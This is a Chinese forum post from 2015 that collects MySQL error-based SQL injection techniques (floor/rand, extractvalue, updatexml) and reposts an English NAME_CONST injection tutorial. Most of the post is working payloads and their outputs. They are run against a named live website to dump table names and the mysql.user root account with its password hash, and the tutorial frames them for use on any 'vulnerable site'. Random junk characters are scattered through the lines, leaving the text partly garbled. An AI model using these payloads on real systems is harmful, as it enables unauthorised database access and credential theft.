|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
6 f+ t c0 m) F' i" E" V$ P首先进行正常查询: mysql> select * from article where id = 1;
0 i0 E( j5 z! ^% y1 ~4 q$ H+—-+——-+———+. w; D3 E( L5 ^7 c$ P
| id | title | content |. v; L5 s* d; \
+—-+——-+———+4 N# w& l9 J5 L# V8 I) G
| 1 | test | do it |$ A; c0 w4 h" d/ r; f+ M; h" O
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);1 T9 ~9 n4 s+ H+ E. {5 T
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。2 E/ P) i( s5 i+ E5 w" T
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
M; v. c( p9 |8 G2 oERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
; Y+ Q" u) I- [6 L; Q2 J' |ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue1 r; y7 o- f/ Z' t8 |5 T$ T
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–3 s" o% i& |1 X D
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ , F6 x( t" j2 N' S4 @% R8 h8 X
# ^6 `8 w, r* E5 l: a
再收集: , g) R! b7 E8 E! r/ r, B
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
7 r" {5 u4 w) T5 o0 c
1 o w/ L2 x7 n" f4 TError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
" x( G' T/ \: h' R4 Q- j$ S* ]; I+ O7 R7 E- l
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)6 f2 h" T, i; Z; H
( P, _' d5 a$ M/ Y N) W% k7 uErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ % i( [+ x1 ~" t0 ^3 f& D
. P# g: [1 I2 D6 \+ u/ z6 ?MYSQL高版本报错注入技巧-利用NAME_CONST注入' s4 i# V8 q# E: ]0 Z1 Y
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. / f2 N* i! e4 x* t+ y
1 I$ X; k5 d& R$ B" ]+ y" T6 \
6 G7 H. p4 O& d& F; v" n' B相关信息' h, {, U' t- e$ l& `0 w- C
' L5 O% s6 ~. |: XNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
2 |1 b. j+ L _. B! j, K5 h( |4 i
! j0 _# i ]/ _) ]) g2 G7 C# WCode:, b5 V/ k; ~, L( a6 ~: p: y5 h' H
NAME_CONST(DATA, VALUE)
3 r/ b7 X* F# h3 ~; j; D# u8 @
3 B2 b2 [. }$ b; nReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.: o: p# E1 q' u O6 [7 b- o
3 t$ V; {. S3 Q# \& o$ `SELECT NAME_CONST('TEST', 1)
6 Q4 M1 ~( | n6 C) Z( `% A4 O; W4 A" b6 a/ I
% d8 [* d2 Q, r7 F% I. A) m! F/ r
4 l2 p7 K$ g( d h|---------------|% u3 q5 Q6 g/ p) Q% t3 q" y( L M
| TEST |% x+ e0 i1 X+ y# W E% f( a' s
| |
& O0 C$ k1 t, b: ?9 ]- G|---------------|5 I Z0 v3 P X# j6 K
| 1 |' N3 N& q( k' n, O' z; ~
| |/ q1 @# k( l8 L8 n5 ^3 J+ H
|---------------|! I+ L5 h& |/ B& O7 u
2 a$ |' w; P- W- R( s- R/ G# ^
% }$ ~1 s+ Q# x" z# [; x" c) g# V- ?0 ^+ v- [5 c; U' {
; y+ W/ j8 o* v$ Z: X) z9 Y
http://dev.mysql.com/doc/refman/5.0/en/m...name-const( X* t1 F$ s4 X- N1 ^
Intro to MySQL Variables; O, Z4 |) p7 }# w& @! j
' o* S- k6 l3 W
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.& M( W. C$ r6 {5 n( p, r$ e
* z) |7 |. {& ?& Q, |+ A" u
Code:; j w- S1 E- y) o
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261& L/ u |; u5 P$ @4 f
3 M8 |' P0 O2 q+ B8 }$ W. e; I* q3 R0 j9 ]8 f( @
: t% A7 \( d: m! P, u) Y9 z# R) Y
& g# Z' r2 z; h3 M% rCode:
, e6 B. A) k) j/ |6 r, P9 Kand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--7 U0 A; O' C- a
( p m2 M) H; y1 X+ C
) q4 K0 J* O) Z* m% aVAR = Your MySQL variable.
: w: L5 ~6 i5 Z- b( \8 @+ x6 l( s; r6 S7 l$ O, B# F' z# m' t8 p
MySQL 5.1.3 Server System Variables$ [& D* y& @3 R/ |$ a4 r
0 V* J; c9 ]% C
Let's try it out on my site..
( q, f0 _- C- H8 L5 O# \
4 O6 K8 w# B& U+ n' F' uCode:
* @. c$ P8 W7 ^http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
$ P& ^8 c L% u/ @5 {/ p `: m/ I3 y+ T
Erroruplicate column name '5.0.27-community-nt'8 y# ~/ u2 b: b7 {: \1 G
4 C- y" S6 l& t2 n" f2 E
5 B0 @5 }2 Y7 O1 T. l0 V3 J& `5 f0 p
: c7 _) K' }" l( z0 _: \4 V- @# h/ i; \7 F: s; M. {
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
% G; N" ?. l6 j" @4 V) \! X- D2 I; \& F) f/ l' ]& W
Data Extraction; @8 O* n$ l$ ]/ K+ b1 G2 n* O
" U! [$ ? i% U- \5 L7 P5 I
Code:* H9 |" B4 u% P; _3 x/ O
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--3 d0 u8 @6 q* K( M O* f0 M3 U
; r' E0 [% B! J% m; |
* N& I6 K2 W6 Z( r, b
We should get a duplicate column 1 error...& l: T: k4 v; U
/ Y& s8 `1 P! t
Code:9 X9 h2 j5 ^4 y* i
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
6 `" B6 Q9 F3 \' G% I$ j& r
) ?6 p' d6 r& |2 z: @4 t( x, W* @( O4 JErroruplicate column name '1
) t' {/ l0 T. g+ a( n/ R+ k2 j. p" ~% b F) _4 z
6 B0 V2 X- o) A+ v' z- `: s* t! B
6 P( y- j' a' M
7 t' m- R8 Y% P# ?
1 T0 H( p7 z z* |2 d9 U, z: t+ |. A) k8 y# E3 d9 g
Now let's get the tables out this bitch..
* S, {8 o; ^: q# f- R8 l9 F! J5 [+ w& Q( k
Code:0 ]; j3 Y, ]; n
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
& W* c( B1 O5 U+ z! R- O2 K
7 [- c- k) m" I; R+ R f7 `
: `/ C6 ?' t9 c. a# G. RLet's see if it works here, if it does, we can go on and finish the job.
' j* I2 }8 `; E& c; p7 ]. K
3 {2 k" L/ a9 K$ @, v3 G1 ~+ N6 L QCode:3 `- F4 U0 x6 ?! \ O
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
' l9 H$ o! w3 ]; w6 q, E1 _# z( S+ L% }
# L$ b! a Q) Z
Erroruplicate column name 'com_admanage
: b) \. ^8 t8 K5 y: X& Y1 V2 j4 f! ?
5 D* c; B8 G2 z& K( U: @ A
( q! M ?! j0 `* X2 A2 ^1 H: i8 R' I& L- h5 S# X( Q
" g& J2 I) w0 i: t- }& f7 f
# K, z3 a: V) B$ B; kNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.2 r. w3 o" J5 W- Y% I2 z; C) K; {
3 ]8 k& k7 L# u0 _/ c
Let's get the columns out of the user table..1 J. ?+ n5 e/ Q4 N0 L9 Q! A
: U+ _7 q p! y+ g5 Z& j# [/ p' DCode:
9 N& t5 b2 |, E5 v+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
- ~9 x" U$ `7 W! e1 w1 W( }0 q8 J- U: \; e. s
3 E0 y5 l* c8 M$ v
So mine looks like this, and I get the duplicate column name 'Host'.
& B2 h* l7 A! L! M
/ k7 k6 |1 M. h fCode:' o5 U# X: C% b% r$ X0 J. e9 O
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
: }4 S; ~. ~3 O" Q4 z) {$ I7 {+ N) I& Y
Erroruplicate column name 'Host'0 Z) ^. U* j3 L1 C7 u
) |* t: y3 H9 B3 g; ?
* d7 b* ]! o4 l; R6 J
$ r1 X9 q+ h& n4 o
) f, ^, w+ J- _ l5 w, `; `* ]
: {6 a0 ~5 p$ d( [
2 Y4 L+ d5 P# O( @7 j2 @) G9 dWoot, time to finish this bitch off.
) E% @, M1 @- V2 Z
# O& Y7 `9 c$ ^1 w. OCode:
% X3 K6 K2 a6 q$ C# ^+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
; W! P, d$ }7 F! F& v& _8 S _4 |' m" A' w' E7 f( c
' D! B( f4 f% L: Y3 Q+ f+ l" u+ oSo mine looks like this...
: r" u& F! {) U4 |9 e% k; g; s- Q/ T6 b
Code:" c l2 m v- Y+ ]
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--$ P! O3 x" \% N. H3 g+ w
/ q* w6 K4 p7 u" m; e- [
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
5 O- z" P! e1 B! a8 |
4 b5 [3 \ v9 k2 @9 G! `' Y( L% a3 V' v' k/ l2 C
, @4 C& Y) `2 ?. e6 ]3 ?( S
p' n H% ~; ^2 q4 h! e7 i/ |. S; B; z
1 U# R7 u+ [) f
And there we have it, thanks for reading.
( ^4 g8 R! l, c' x
3 C+ }: }: X! W |
发表于 2015-11-11 19:03:37
收藏
支持
反对